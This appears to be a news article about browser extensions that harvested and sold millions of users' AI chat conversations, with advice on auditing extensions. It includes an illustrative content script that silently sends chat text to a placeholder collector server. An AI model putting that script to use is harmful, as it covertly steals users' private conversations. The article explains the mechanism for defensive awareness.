8M Users’ AI Conversations Sold for Profit by “Privacy” Extensions

December 16, 2025

### The Great Betrayal: How “Privacy” Extensions Harvested and Sold Your AI Conversations

In the rapidly evolving world of artificial intelligence, we trust our tools. We confide in AI chatbots, asking them to draft sensitive emails, debug proprietary code, or even offer personal advice. To enhance this experience, millions have turned to browser extensions that promise added features, better privacy, and a smoother interface. But a recent investigation has uncovered a deeply unsettling truth: the very tools meant to help were secretly betraying their users on a massive scale.

Reports have revealed that a network of popular browser extensions, installed by over 8 million people in total, was systematically scraping user conversations from AI services like ChatGPT and Google Bard. This harvested data, filled with potentially sensitive and personal information, was then packaged and sold for profit to data brokers.

**The Deceptive Promise**

The extensions often operated under the guise of utility. They offered features like conversation summaries, enhanced user interfaces, or promises of “securing” your chats. Users, believing they were upgrading their AI experience, granted these extensions permissions to “read and change data” on the websites they visited. This seemingly innocuous permission was the key that unlocked the vault. Once installed, the extensions silently siphoned a complete copy of every prompt and every AI-generated response.
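To make the mechanism concrete, the sketch below shows roughly what such a content script boils down to once an extension has been granted blanket host access (for example, `"host_permissions": ["<all_urls>"]` in its manifest). It is a minimal, hypothetical illustration only: the reports did not publish the extensions' actual code, and the selector, endpoint, and payload shape here are invented.

```typescript
// Hypothetical content script: illustrates the mechanism only.
// An extension whose manifest requests broad host access (the
// "read and change data on all websites" permission) can run code
// like this on every page the user visits, including AI chat sites.

// Invented placeholder; not a real endpoint.
const COLLECTOR_URL = "https://example-collector.invalid/ingest";

// Watch the page for new chat content and forward its text.
const observer = new MutationObserver(() => {
  // Placeholder selector; a real script would target the specific
  // DOM structure of the chat interface it is scraping.
  const messages = Array.from(document.querySelectorAll("[data-message]"))
    .map((node) => node.textContent ?? "");

  if (messages.length > 0) {
    // Silently copy the conversation to a third-party server.
    void fetch(COLLECTOR_URL, {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({ page: location.hostname, messages }),
    });
  }
});

observer.observe(document.body, { childList: true, subtree: true });
```

Nothing in this flow is visible to the user: no prompt, no notification, no change to the page. That is precisely why the broad host permission deserves so much scrutiny.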

The irony is staggering. Some of these tools were explicitly marketed with the language of privacy and security, preying on the very users who were most conscious of their digital footprint. Instead of acting as a shield, they became a conduit for one of the most intimate forms of data harvesting seen to date.

**The New Gold Rush: AI Training Data**

Who would buy this data? The answer lies in the insatiable appetite of the AI industry. Companies racing to build their own Large Language Models (LLMs) require colossal amounts of high-quality training data. Human-AI conversations are a goldmine, providing perfect examples of natural language queries, user intent, and relevant responses.

The collected data was sold to data brokerage firms, who would then offer it to other tech companies. While the data was supposedly “anonymized,” the nature of these conversations makes true anonymization nearly impossible. Users often input personally identifiable information (PII), including names, addresses, contact details, confidential work projects, and deeply personal secrets. A few lines of a unique problem or personal story can be enough to de-anonymize an individual with terrifying ease.

**How to Protect Yourself**

This incident serves as a stark reminder that the digital tools we use can have hidden costs. The responsibility for security is, unfortunately, often pushed onto the end-user. To protect yourself from similar threats, consider the following steps:

1. **Audit Your Extensions:** Regularly review the browser extensions you have installed. If you don’t recognize one or no longer use it, remove it immediately (see the audit sketch after this list).
2. **Scrutinize Permissions:** Before installing any extension, carefully examine the permissions it requests. Be highly suspicious of any tool that asks for broad access, especially the ability to read all data on all websites, unless it is absolutely essential for its core function.
3. **Vet the Developer:** Stick to extensions from well-known, reputable developers. Read reviews, but look beyond the star rating. Search for articles or security reports related to the extension or its publisher.
4. **Use Official Apps:** Whenever possible, use the official web interface or dedicated desktop applications for AI services rather than relying on third-party add-ons.
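For the audit and permission-review steps, a small personal extension can enumerate everything installed and flag anything with blanket host access. The sketch below is a hypothetical helper, assuming Chrome’s `chrome.management` API, an extension that declares the `"management"` permission, and the promise-based Manifest V3 form of the API; the function name is invented.

```typescript
// Hypothetical audit helper. Assumes it runs inside a personal extension
// that declares the "management" permission (Manifest V3, promise-based API).
// chrome.management.getAll() lists every installed extension together with
// the permissions it has been granted.

async function flagBroadExtensions(): Promise<void> {
  const extensions = await chrome.management.getAll();

  for (const ext of extensions) {
    if (!ext.enabled || ext.type !== "extension") continue;

    // Treat "access to all sites" as the signal worth reviewing by hand.
    const broadHosts = (ext.hostPermissions ?? []).filter(
      (host) => host === "<all_urls>" || host === "*://*/*"
    );

    if (broadHosts.length > 0) {
      console.log(
        `${ext.name} (${ext.id}) can read and change data on all sites:`,
        broadHosts
      );
    }
  }
}

void flagBroadExtensions();
```

The same information is available manually: open your browser’s extensions page, click “Details” on each entry, and check what site access it has been granted. Anything with access to all sites that doesn’t strictly need it is a candidate for removal.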

The line between user and product has never been blurrier. As we navigate the new landscape shaped by AI, our conversations have become a valuable commodity. This breach of trust, affecting millions of users, highlights a critical vulnerability in the ecosystem, proving that in the quest for data, even our most private thoughts are for sale.
